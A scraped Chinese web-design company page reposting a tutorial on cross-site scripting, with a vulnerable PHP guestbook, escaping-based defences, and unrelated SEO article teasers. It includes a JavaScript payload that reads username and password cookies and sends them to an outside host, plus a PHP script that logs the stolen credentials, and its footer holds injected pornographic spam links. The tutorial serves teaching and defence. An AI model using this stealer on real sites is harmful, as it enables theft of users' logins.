1. <nobr id="easjo"><address id="easjo"></address></nobr>

      <track id="easjo"><source id="easjo"></source></track>
      1. 
        

      2. <bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>
      3. <track id="easjo"><source id="easjo"><em id="easjo"></em></source></track><option id="easjo"><span id="easjo"><em id="easjo"></em></span></option>
          貴州做網站公司
          貴州做網站公司~專業!靠譜!
          10年網站模板開發經驗,熟悉國內外開源網站程序,包括DEDECMS,WordPress,ZBlog,Discuz! 等網站程序,可為您提供網站建設,網站克隆,仿站,網頁設計,網站制作,網站推廣優化等服務。我們專注高端營銷型網站,企業官網,集團官網,自適應網站,手機網站,網絡營銷,網站優化,網站服務器環境搭建以及托管運維等。為客戶提供一站式網站解決方案?。?!

          跨站腳本攻擊XSS是什么?

          來源:互聯網轉載 時間:2024-10-28 22:43:16

          跨站腳本攻擊(Cross Site script為了區別于CSS簡稱為XSS)指的是惡意攻擊者往Web頁面里插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執行,從而達到惡意用戶的特殊目的。

          當在響應頁面中返回用戶輸入的JavaScript代碼時,瀏覽器便會執行該代碼。攻擊者往往利用該原理向網頁中插入惡意代碼,并生成惡意鏈接誘使用戶點擊。當用戶點擊該連接時,便會生成對Web站點的請求,其中的參數值含有惡意的JavaScript代碼。

          如果Web站點將這個參數值嵌入在響應的HTML頁面中(這正是站點問題的本質所在),惡意代碼便會在用戶瀏覽器中運行,達到攻擊者的目的。

          Web站點中所包含的腳本直接將用戶在HTML頁面中的輸入(通常是參數值)返回,而不預先加以清理。 如果腳本在響應頁面中返回由JavaScript代碼組成的輸入,瀏覽器便可以執行此輸入。 因此,有可能形成指向站點的若干鏈接,且其中一個參數包含惡意的JavaScript代碼。 該代碼將在站點上下文中(由用戶瀏覽器)執行,這使得該代碼有權訪問用戶在該站點中具有訪問權的cookie,以及站點中其他可通過用戶瀏覽器訪問的窗口。

          攻擊依照下列方式繼續進行:攻擊者誘惑合法用戶單擊攻擊者生成的鏈接。用戶單擊該鏈接時,便會生成對于Web站點的請求,其中的參數值含有惡意的JavaScript代碼。 如果Web站點將這個參數值嵌入在響應的HTML頁面中(這正是站點問題的本質所在),惡意代碼便會在用戶瀏覽器中運行。

          一個簡單的留言板

          我們有個頁面用于允許用戶發表留言,然后在頁面底部顯示留言列表

          <!DOCTYPEhtml>
          <html>
          <head>
          <?phpinclude('/components/headerinclude.php');?></head>
          <styletype="text/css">
          .comment-title{
          font-size:14px;
          margin:6px0px2px4px;
          }
          .comment-body{
          font-size:14px;
          color:#ccc;
          font-style:italic;
          border-bottom:dashed1px#ccc;
          margin:4px;
          }
          </style>
          <scripttype="text/javascript"src="/js/cookies.js"></script>
          <body>
          <formmethod="post"action="list.php">
          <pstyle="margin:20px;">
          <pstyle="font-size:16px;font-weight:bold;">YourComment</p>
          <pstyle="padding:6px;">
          NickName:
          <br/>
          <inputname="name"type="text"style="width:300px;"/>
          </p>
          <pstyle="padding:6px;">
          Comment:
          <br/>
          <textareaname="comment"style="height:100px;width:300px;"></textarea>
          </p>
          <pstyle="padding-left:230px;">
          <inputtype="submit"value="POST"style="padding:4px0px;width:80px;"/>
          </p>
          <pstyle="border-bottom:solid1px#fff;margin-top:10px;">
          <pstyle="font-size:16px;font-weight:bold;">Comments</p>
          </p>
          <?php
          require('/components/comments.php');
          if(!empty($_POST['name'])){
          addElement($_POST['name'],$_POST['comment']);
          }
          renderComments();
          ?>
          </p>
          </form>
          </body>
          </html>

          addElement()方法用于添加新的留言,而renderComments()方法用于展留言列表,網頁看起來是這樣的。

          XSS

          因為我們完全信任了用戶輸入,但有些別有用心的用戶會像這樣的輸入

          這樣無論是誰訪問這個頁面的時候控制臺都會輸出“Hey you are a fool fish!”,如果這只是個惡意的小玩笑,有些人做的事情就不可愛了,有些用戶會利用這個漏洞竊取用戶信息、誘騙人打開惡意網站或者下載惡意程序等。

          利用xss竊取用戶名密碼

          當然這個示例很簡單,幾乎攻擊不到任何網站,僅僅看看其原理。我們知道很多登陸界面都有記住用戶名、密碼的功能方便用戶下次登錄,有些網站是直接用明文記錄用戶名、密碼,惡意用戶注冊賬戶登錄后使用簡單工具查看cookie結構名稱后,如果網站有xss漏洞,那么簡單的利用jsonp就可以獲取其它用戶的用戶名、密碼了。

          惡意用戶會這么輸入

          我們看看http://test.com/hack.js里藏了什么?

          varusername=CookieHelper.getCookie('username').value;
          varpassword=CookieHelper.getCookie('password').value;
          varscript=document.createElement('script');
          script.src='http://test.com/index.php?username='+username+'&password='+password;
          document.body.appendChild(script);

          幾句簡單的javascript,獲取cookie中的用戶名密碼,利用jsonp把向http://test.com/index.php

          發送了一個get請求

          http://test.com/index.php

          <?php
          if(!empty($_GET['password'])){
          $username=$_GET['username'];
          $password=$_GET['password'];
          $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
          $fp=fopen($path,'a');
          flock($fp,LOCK_EX);
          fwrite($fp,"$username\t$password\r\n");
          flock($fp,LOCK_UN);
          fclose($fp);
          }
          ?>

          這樣惡意用戶就把訪問留言板的用戶的信息竊取了

          怎么預防

          上面演示的是一個非常簡單的XSS攻擊,還有很多隱蔽的方式,但是其核心都是利用了腳本注入,因此我們解決辦法其實很簡單,不信賴用戶輸入,對特殊字符如”<”,”>”轉義,就可以從根本上防止這一問題,當然很多解決方案都對XSS做了特定限制,如上面這中做法在ASP.NET中不幸不同,微軟validateRequest對表單提交自動做了XSS驗證。但防不勝防,總有些聰明的惡意用戶會到我們的網站搞破壞,對自己站點不放心可以看看這個XSS跨站測試代碼大全試試站點是否安全。

          一、 過濾用戶輸入的內容,檢查用戶輸入的內容中是否有非法內容。如<>(尖括號)、"(引號)、'(單引號)、%(百分比符號)、;(分號)、()(括號)、&(&符號)、+(加號)等。

          二、嚴格控制輸出

          可以利用下面這些函數對出現xss漏洞的參數進行過濾

          1、htmlspecialchars()函數,用于轉義處理在頁面上顯示的文本。

          2、htmlentities()函數,用于轉義處理在頁面上顯示的文本。

          3、strip_tags()函數,過濾掉輸入、輸出里面的惡意標簽。

          4、header()函數,使用header("Content-type:application/json");用于控制json數據的頭部,不用于瀏覽。

          5、urlencode()函數,用于輸出處理字符型參數帶入頁面鏈接中。

          6、intval()函數用于處理數值型參數輸出頁面中。

          7、自定義函數,在大多情況下,要使用一些常用的html標簽,以美化頁面顯示,如留言、小紙條。那么在這樣的情況下,要采用白名單的方法使用合法的標簽顯示,過濾掉非法的字符。

          各語言示例:

          PHP的htmlentities()或是htmlspecialchars()。

          Python的cgi.escape()。

          ASP的Server.HTMLEncode()。

          ASP.NET的Server.HtmlEncode() 或功能更強的 Microsoft Anti-Cross Site Scripting Library

          Java的xssprotect(Open Source Library)

          Node.js的node-validator。

          這是陽光明媚的一天,互聯網里風平浪靜,一切都是欣欣向榮。我就是在這樣一個平凡的日子里誕生了。我給自己起了個名字叫超,不過我的師哥師姐們都喜歡叫我小超。從出生的那...

          網上關于SEO優化的知識很多也很雜,很多新手都不知道如何選擇。本來耗子網站里每篇文章都有的詳細步驟的,考慮到很雜,于是耗子對各種SEO優化基礎知識進行了整理,但...

          今天,我給大家講講如何利用電影貼吧引流輕松變現。這個很適合新手。廢話不多說,直接上干貨。每上映一個新片子,只要這個片子有一定的熱度,馬上該片子的貼吧就會出現各種...

          很多人不知道,一個好的直播間場景,能有效地提升直播效果。但是,很多豪華直播間,各種設備、燈光,算下來是一筆很大的開銷,并不適合新手。你得根據自己的實際情況去搭建直播間。今天我們分享一個低成本搭建直播間的方案。1、直播環境和布置你的直播環境最好是獨立的,安靜的,面積不用特別大,能陳列你直播間的產品就夠。如果做的是服裝,可能場地需要大一點,因為需要有地方掛衣服。2、直播間背景直播間背景一般不建議用一面...

          在互聯網時代,SEO是每個網站運營者必備的技能之一。而關鍵詞優化則是SEO中最重要的一環。然而,要想讓你的網站排名靠前,僅僅做到基本的關鍵詞優化是遠遠不夠的。本文將為大家分享8個簡單而有效的SEO關鍵詞優化技巧,希望對您的網站排名提升有所幫助。一:使用熱門關鍵詞使用熱門關鍵詞是提高網站排名最基本的方法之一。但是,要想成功,你需要選擇與你的網站主題相關的熱門關鍵詞,并根據搜索引擎的指導進行合理的使用...

          在信息時代,大數據成為了企業和個人發展的關鍵詞。隨著網絡的發展,搜索引擎成為了人們獲取資訊和信息的重要方式之一。而作為中國最大的搜索引擎,百度指數能夠為我們提供更全面、及時和準確的數據和信息,幫助企業和個人更好地掌握市場趨勢和消費者需求。在這個過程中,百度指數會員身份的加入不僅能夠提高使用體驗,還能夠擁有更多的特權和服務,助力創新創業。那么,百度指數會員到底有哪些優勢和價值呢?本文將從以下幾個方面...

          TOP
          国产初高中生视频在线观看|亚洲一区中文|久久亚洲欧美国产精品|黄色网站入口免费进人
          1. <nobr id="easjo"><address id="easjo"></address></nobr>

              <track id="easjo"><source id="easjo"></source></track>
              1. 
                

              2. <bdo id="easjo"><optgroup id="easjo"></optgroup></bdo>
              3. <track id="easjo"><source id="easjo"><em id="easjo"></em></source></track><option id="easjo"><span id="easjo"><em id="easjo"></em></span></option>